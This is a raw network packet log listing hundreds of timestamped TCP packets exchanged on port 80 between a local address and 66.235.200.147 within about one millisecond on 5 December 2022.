Dec 5, 2022 01:32:37.789863110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.789881945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789889097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.789910078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789937973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789968014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789978981 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.789995909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790003061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.790024042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790052891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790082932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790088892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.790110111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790119886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.790138960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790175915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790204048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790216923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.790231943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790239096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.790261030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790290117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790318012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790328026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.790355921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.790549040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790606022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790637016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790667057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790684938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.790699959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790709019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.790730000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790761948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790787935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.790791988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790819883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790831089 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.790848017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790887117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.790888071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790916920 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790947914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.790958881 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.790976048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791003942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791032076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791042089 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.791060925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791068077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.791090012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791120052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791143894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.791160107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791209936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791239977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791241884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.791268110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791276932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.791297913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791326046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791363955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.791538954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791588068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.791599035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791629076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791660070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791677952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.791690111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791718960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791747093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791762114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.791774988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791788101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.791802883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791831017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791843891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.791858912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791887045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791897058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.791914940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791943073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791973114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.791984081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792001963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792010069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792030096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792058945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792088032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792098999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792114973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792123079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792143106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792171001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792201996 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792211056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792231083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792259932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792262077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792485952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792515993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792536974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792545080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792551994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792573929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792603016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792630911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792643070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792659044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792665958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792687893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792716980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792746067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792757034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792773008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792781115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792802095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792831898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792860985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792871952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792891026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792900085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792920113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792947054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.792967081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.792975903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793004036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793030977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.793031931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793060064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793088913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793100119 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.793118000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793126106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.793145895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793174028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793215036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.793450117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793478966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793503046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.793509007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793539047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793566942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793581963 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.793596029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793606997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.793623924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793653011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793680906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793694019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.793709040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793715000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.793737888 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793766022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793792963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793802023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.793822050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793831110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.793850899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793879032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793906927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793917894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.793935061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793942928 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.793962955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.793992043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794019938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794034004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.794047117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794056892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.794075012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794106960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794136047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794140100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.794184923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.794507027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794538021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794567108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794591904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.794595957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794625044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794653893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794678926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.794681072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794709921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794715881 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.794744968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794753075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.794773102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794804096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794811964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.794833899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794862032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794871092 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.794907093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794936895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794965029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.794976950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.794992924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795003891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795021057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795048952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795078993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795090914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795109034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795114040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795137882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795165062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795192003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795203924 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795219898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795231104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795437098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795465946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795494080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795520067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795522928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795551062 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795552969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795581102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795610905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795624018 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795639992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795670033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795698881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795728922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795757055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795758009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795757055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795782089 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795794010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795821905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795834064 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795850039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795876980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795906067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795917034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795934916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795947075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.795963049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.795990944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796017885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796035051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.796046972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796067953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.796075106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796103001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796130896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796139956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.796165943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.796396971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796426058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796453953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796482086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796508074 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.796511889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796525955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.796539068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796569109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796597958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796622992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.796627045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796652079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.796654940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796683073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796691895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.796715021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796744108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796772003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796787024 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.796799898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796808958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.796829939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796859980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796901941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796911955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.796931028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796941042 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.796960115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796992064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.796998978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.797020912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797051907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797082901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797094107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.797113895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797122955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.797352076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797383070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797411919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797430038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.797441959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797446012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.797471046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797499895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797529936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797538996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.797564983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797566891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.797593117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797621012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797648907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797662020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.797677040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797687054 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.797704935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797732115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797760010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797789097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797817945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797840118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.797840118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.797847033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797869921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.797877073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797904968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797918081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.797934055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797960997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.797991037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798002958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.798018932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798027039 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.798048019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798140049 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.798332930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798357010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798381090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798403978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798413038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.798429012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798450947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798460007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.798474073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798496962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798501968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.798518896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798542023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798546076 CET	49705	80	192.168.2.3	66.235.200.147
